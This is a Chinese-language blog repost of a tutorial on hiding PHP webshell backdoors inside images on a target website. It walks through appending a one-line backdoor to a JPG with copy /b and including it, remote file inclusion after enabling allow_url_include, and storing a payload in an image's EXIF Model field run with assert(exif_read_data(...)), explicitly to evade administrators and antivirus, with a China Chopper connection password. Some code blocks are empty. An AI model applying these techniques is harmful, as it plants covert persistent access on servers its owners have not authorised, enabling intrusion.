php上传后门,PHP图片后门藏匿攻略
我們平時藏匿圖片后門是什么流程呢?我們來看一下
0x01 初級的藏匿方法:
1、建立一個eval.php文件,上面加入我們的后門:
Default
1
2、找一張圖片1.jpg,最好是從目標網站上下載下來的圖片。
3、合并圖片和php后門:
Default
Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg
1
Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg
4、在任何一個php文件中包含這個2.jpg的圖片后門,這里以images.php為例,寫入以下的代碼:
Default
1
5、上傳2.jpg和images.php,在菜刀里添加一句話后門:http://127.0.0.1/images/images.php,密碼為feiji。
訪問圖片正常:
訪問images.php頁面出現亂碼,但是后門已經正常運行:
但是一句話在菜刀里是可以解析成功的:
注:省去第3步也是可以的,只不過直接訪問圖片會亂碼,會讓管理員起疑心。
0x02 中級藏匿的方法:
1、其實就是遠程文件包含,也不只是針對圖片,要求你有高權限,能夠操縱Apache和修改php.ini文件:
修改ini的配置選項allow_url_fopen和allow_url_include為ON。
2、創建任何一個php文件中,以images.php為例,寫入以下的代碼:
Default
1
3、剛才做的圖片后門jpg可以放在別的網站(http://www.xxxx.com)上,在菜刀里添加一句話后門:
注:這樣做的優點是可以隨時變換各種后門,缺點是很難獲取到高權限。
0x03 高級的藏匿方法
背景知識:
EXIF信息: 是可交換圖像文件的縮寫,是專門為數碼相機的照片設定的,可以記錄數碼照片的屬性信息和拍攝數據。所有的JPEG文件以字符串“0xFFD8”開頭,并以字符串“0xFFD9”結束。文件頭中有一系列“0xFF??”格式的字符串,稱為“標識”,用來標記JPEG文件的信息段。“0xFFD8”表示圖像信息開始,“0xFFD9”表示圖像信息結束,這兩個標識后面沒有信息,而其它標識緊跟一些信息字符。
其實就是這個玩意兒:選定圖片右鍵選擇屬性,在詳細信息里面可以看到(win7)
1、php里面有一個函數exif_read_data(),可以取得圖片的EXIF信息頭,但是需要開啟php_exif模塊。
2、我們是可以隨意修改EXIF信息的,例如:
這里推薦一個小工具,PowerExif ,下載地址為:
免費版可以修改部分EXIF信息頭,但是對我們來說已經足夠了。
打開工具,點擊添加,在修改機型信息,如下:
添加我們的PAYLOAD:
3、我們來調試一下:
Default
$exif = exif_read_data('460.jpg');
var_dump($exif);
?>
1
2
3
4
5
6
7
$exif=exif_read_data('460.jpg');
var_dump($exif);
?>
輸出:
4、利用方法:
在php腳本上寫入:
Default
$exif = exif_read_data ('460.jpg');
assert($exif['Model']);
?>
1
2
3
4
5
6
7
$exif=exif_read_data('460.jpg');
assert($exif['Model']);
?>
有同學可能會問,為什么要使用這種方法藏匿圖片后門,這個不是和初級的藏匿方法等效嗎?原因有三:
有經驗的管理員一看include文件就會發現有端倪。
殺軟會重點檢查include包含的文件。
exif_read_data()函數可以包含遠程的JPG文件,也就是等效于一個遠程漏洞文件包含咯。
【via@91ri.org團隊】 未經授權,禁止轉載!
總結
以上是生活随笔為你收集整理的php上传后门,PHP图片后门藏匿攻略的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 欧文分校计算机新sat多少分录取,加州大
- 下一篇: URL的作用是什么?它由几部分组成?